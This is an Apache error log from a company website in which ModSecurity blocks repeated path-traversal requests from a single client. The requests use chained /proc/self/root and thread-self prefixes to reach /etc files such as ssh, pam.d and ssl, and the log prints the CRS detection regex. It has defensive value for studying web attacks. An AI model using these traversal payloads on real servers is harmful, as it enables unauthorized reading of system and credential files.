[Tue Mar 17 21:19:26.350469 2026] [:error] [pid 31803:tid 140411674785536] [client 74.7.241.31:33320] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/adjtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnvjuyqAr6etmhZHNpQLAAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:19:38.125833 2026] [proxy_fcgi:error] [pid 31803:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:50424] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:19:39.630658 2026] [:error] [pid 17653:tid 140411574073088] [client 74.7.241.31:40820] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnvm8df6f5d65gmYZRmOQAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:19:42.047937 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.241.31:40822] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnvnta6ubjKNq_cu4Yv-QAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:19:43.500595 2026] [:error] [pid 11088:tid 140411674785536] [client 74.7.241.31:40836] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnvn2mqtCojLHvu5cKSIgAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:19:45.066296 2026] [:error] [pid 29151:tid 140411624429312] [client 74.7.241.31:40844] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnvofPqhzTj3BvfDX-yDwAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:19:46.831323 2026] [:error] [pid 11088:tid 140411699963648] [client 74.7.241.31:40854] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnvommqtCojLHvu5cKSJAAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:19:59.133830 2026] [proxy_fcgi:error] [pid 17653:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:51106] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:20:00.714105 2026] [:error] [pid 6296:tid 140411599251200] [client 74.7.241.31:45634] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnvsHIk7brgkOH-rIW2CAAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:20:04.335656 2026] [:error] [pid 29151:tid 140411741927168] [client 74.7.241.31:41518] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnvtPPqhzTj3BvfDX-yIAAAAcA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:20:05.993002 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.241.31:41522] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnvtdY0UrI5A3LftIworwAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:20:07.189758 2026] [:error] [pid 29151:tid 140411708356352] [client 74.7.241.31:52824] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnvt_PqhzTj3BvfDX-yIgAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:20:08.403664 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.241.31:52828] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnvuOyqAr6etmhZHNpQQQAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:20:09.959934 2026] [:error] [pid 11816:tid 140411658000128] [client 74.7.241.31:52834] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnvuew_le52K8_3pV110wAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:20:12.251780 2026] [:error] [pid 11088:tid 140411708356352] [client 74.7.241.31:52848] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnvvGmqtCojLHvu5cKSMwAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:20:20.152021 2026] [proxy_fcgi:error] [pid 6296:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:51650] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:20:24.287776 2026] [:error] [pid 6296:tid 140411725141760] [client 74.7.241.31:50836] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnvyHIk7brgkOH-rIW2DwAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:20:26.325420 2026] [:error] [pid 11816:tid 140411590858496] [client 74.7.241.31:50842] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnvyuw_le52K8_3pV114wAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:20:27.671181 2026] [:error] [pid 2598:tid 140411632822016] [client 74.7.241.31:50738] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnvyxj0p0SRWAqcjGGiwwAAAw0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:20:29.110825 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.241.31:50744] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnvzdY0UrI5A3LftIwougAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:20:31.441344 2026] [:error] [pid 11816:tid 140411683178240] [client 74.7.241.31:50758] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnvz-w_le52K8_3pV115gAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:20:33.055535 2026] [:error] [pid 2598:tid 140411699963648] [client 74.7.241.31:50768] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnv0Rj0p0SRWAqcjGGixwAAAwU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:20:42.138409 2026] [proxy_fcgi:error] [pid 19507:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:52188] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 21:20:43.570721 2026] [:error] [pid 29151:tid 140411557287680] [client 74.7.241.31:34978] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnv2_PqhzTj3BvfDX-yLQAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:20:45.767460 2026] [:error] [pid 11088:tid 140411582465792] [client 74.7.241.31:34994] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnv3WmqtCojLHvu5cKSTgAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 21:20:46.251161 2026] [:error] [pid 11088:tid 140411725141760] [client 74.7.241.31:34994] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnv3mmqtCojLHvu5cKSTwAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
